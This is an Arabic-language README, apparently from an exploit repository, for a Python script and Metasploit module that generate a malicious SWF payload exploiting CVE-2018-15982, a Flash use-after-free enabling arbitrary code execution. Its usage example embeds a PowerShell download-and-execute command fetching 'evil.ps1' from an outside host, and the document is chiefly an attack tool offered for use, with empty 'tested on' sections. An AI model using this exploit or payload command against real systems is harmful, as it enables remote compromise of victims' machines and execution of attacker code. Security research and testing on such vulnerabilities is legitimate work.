
سكريبت ووحدة Metasploit لـ CVE-2018-15982
يقوم هذا السكريبت بإنشاء حمولة swf لـ CVE-2018-15982، وهي مبنية على إثبات المفهوم من https://github.com/smgorelik/Windows-RCE-exploits. تم اكتشاف الثغرة بواسطة Chenming Xu و Ed Miles من Gigamon ATR.
الثغرة هي عيب في استخدام الذاكرة بعد تحريرها (use-after-free) يتيح تنفيذ كود عشوائي في Flash. يمكن العثور على مزيد من المعلومات في الروابط أدناه.
ملاحظة: حاليًا يتم فقط رش كتلة واحدة، لاحظت ذلك بعد إنشاء السكريبت.
الاستخدام:
python create_swf.py <command> <output file name>
مثال الاستخدام:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
تم الاختبار على:
إنشاء الحمولة:

تنفيذ الحمولة:

تأكيد التنفيذ:

